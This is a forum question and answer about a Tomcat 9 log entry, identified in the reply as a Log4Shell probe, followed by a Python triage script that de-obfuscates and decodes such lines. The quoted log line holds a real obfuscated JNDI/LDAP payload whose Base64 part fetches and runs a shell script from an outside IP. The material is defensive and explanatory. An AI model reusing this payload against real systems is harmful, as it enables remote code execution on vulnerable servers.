Tomcat 9: cookie attack?
From Tomcat9 catalina log:
org.apache.tomcat.util.http.parser.Cookie.logInvalidHeader A cookie
header was received [('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-
l}dap${env:BARFOO:-:}//ip:1389/TomcatBypass/Command/Base64/Y2QgL3
RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaH
R0cDovLzE2Ny45OS40OS4xMzIvOFVzQS5zaDsgY3VybCAtTyBodHRwOi8vMTY3Ljk5LjQ5LjEzMi
84VXNBLnNoOyBjaG1vZCA3NzcgOFVzQS5zaDsgc2ggOFVzQS5zaA==}')] that contained an
invalid cookie. That cookie will be ignored.
What is the cookie? Is it an attack?
Comments (1)
This is a probe of your installation for the Log4Shell attack.
By default, Tomcat is immune to the attack.
But you could still be subject to the attack if you (in your custom webapp) use a vulnerable log4j version.
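For triage of log lines like the one in the question, the following added example (not part of the original question or answer) collapses the `${env:BARFOO:-x}` default-value lookups so the hidden `jndi:ldap` string becomes visible, then reports the callback host and the decoded Base64 path segment. The function names, the documentation-range address and the harmless sample command are constructed for illustration, and only the `:-` default-value form seen in this log line is handled.

```python
import base64
import re

# ${name:-default} with no nested lookup inside; Log4j uses the default when name is unset.
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:(\w+)://([^/}\s]+)(/[^}\s]*)?", re.IGNORECASE)
B64_PATH = re.compile(r"/Base64/([A-Za-z0-9+/=]+)")


def collapse_lookups(text, max_rounds=10):
    """Replace ${name:-default} with its default until nothing changes."""
    for _ in range(max_rounds):
        collapsed = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def analyze(line):
    """Return scheme, callback host and decoded command of a JNDI lookup, or None."""
    match = JNDI.search(collapse_lookups(line))
    if not match:
        return None
    finding = {"scheme": match.group(1).lower(), "host": match.group(2), "command": None}
    encoded = B64_PATH.search(match.group(3) or "")
    if encoded:
        try:
            raw = base64.b64decode(encoded.group(1), validate=True)
            finding["command"] = raw.decode("utf-8", "replace")
        except ValueError:  # not valid Base64: report the lookup without a command
            pass
    return finding


# Constructed sample: documentation-range address and a harmless command.
SAMPLE_CMD = "echo constructed-sample"
SAMPLE = (
    "A cookie header was received [('${${env:BARFOO:-j}ndi${env:BARFOO:-:}"
    "${env:BARFOO:-l}dap${env:BARFOO:-:}//198.51.100.7:1389/TomcatBypass/Command/Base64/"
    + base64.b64encode(SAMPLE_CMD.encode()).decode()
    + "}')] that contained an invalid cookie."
)

if __name__ == "__main__":
    print(collapse_lookups(SAMPLE))
    print(analyze(SAMPLE))
```

A hit in the Tomcat log only shows that the header was received and rejected by the cookie parser; whether any web application on the host logs request data through a vulnerable log4j version has to be checked separately.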